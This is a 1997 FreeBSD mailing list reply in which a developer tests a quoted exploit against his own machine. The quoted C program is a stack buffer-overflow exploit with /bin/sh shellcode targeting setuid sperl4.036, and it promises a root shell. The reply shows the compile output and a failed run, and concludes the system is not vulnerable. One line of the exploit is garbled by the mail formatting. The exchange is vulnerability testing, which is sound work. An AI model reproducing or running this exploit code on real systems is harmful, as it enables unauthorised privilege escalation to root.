From owner-freebsd-hackers Tue Aug 5 17:31:53 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA15354 for hackers-outgoing; Tue, 5 Aug 1997 17:31:53 -0700 (PDT) Received: from nico.telstra.net (nico.telstra.net [139.130.204.16]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id RAA15349 for ; Tue, 5 Aug 1997 17:31:49 -0700 (PDT) Received: from freebie.lemis.com (gregl1.lnk.telstra.net [139.130.136.133]) by nico.telstra.net (8.6.10/8.6.10) with ESMTP id KAA19506; Wed, 6 Aug 1997 10:32:02 +1000 From: Greg Lehey Received: (grog@localhost) by freebie.lemis.com (8.8.7/8.6.12) id KAA00549; Wed, 6 Aug 1997 10:01:08 +0930 (CST) Message-Id: <199708060031.KAA00549@freebie.lemis.com> Subject: Re: Security hole script. In-Reply-To: from "Lenzi, Sergio" at "Aug 4, 97 10:12:18 am" To: lenzi@bsi.com.br (Lenzi, Sergio) Date: Wed, 6 Aug 1997 10:01:08 +0930 (CST) Cc: hackers@FreeBSD.ORG Organisation: LEMIS, PO Box 460, Echunga SA 5153, Australia Phone: +61-8-8388-8250 Fax: +61-8-8388-8250 Mobile: +61-41-739-7062 WWW-Home-Page: http://www.lemis.com/~grog X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 X-MIME-Autoconverted: from 8bit to base64 by freebie.lemis.com id KAA00549 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from base64 to 8bit by hub.freebsd.org id RAA15350 Sender: owner-freebsd-hackers@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Lenzi, Sergio writes: > > > Hello all. > > Here is the "script" that opens a hole in our FreeBSD 2.2.2... > > from a friend of mine (lgarcia@netlan.com.br) > ---------------------------cut------------------------------- > #include > #include > #include > > #define BUFFER_SIZE 1400 > #define OFFSET 600 > > char *get_esp(void) { > asm("movl %esp,%eax"); > } > char buf[BUFFER_SIZE]; > > main(int argc, char *argv[]) > { > int i; > char execshell[] = > "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" > "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" > "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" > "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; > > for(i=0+1;i *(char **)&buf[i] = get_esp() - OFFSET; > > memset(buf,0x90,768+1); > memcpy(&buf[768+1],execshell,strlen(execshell)); > > buf[BUFFER_SIZE-1]=0; > > execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL); > } > > ---------------------------------------------------------cut--------- > > install this script, do a make and run it. > > should return a root shell. === grog@freebie (/dev/ttyp1) ~/src 2 -> make crackopen gcc -g -Wall crackopen.c -lm -o crackopen crackopen.c: In function `get_esp': crackopen.c:10: warning: control reaches end of non-void function crackopen.c: At top level: crackopen.c:14: warning: return-type defaults to `int' crackopen.c: In function `main': crackopen.c:25: warning: implicit declaration of function `memset' crackopen.c:31: warning: control reaches end of non-void function === grog@freebie (/dev/ttyp1) ~/src 3 -> crackopen Can't open perl script "ë#^^ 1ÒVVVV1À°;N ÊRQSPëèØÿÿÿ/bin/sh4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï": File name too long Segmentation fault === grog@freebie (/dev/ttyp1) ~/src 4 -> I presume this means that mine isn't vulnerable. Greg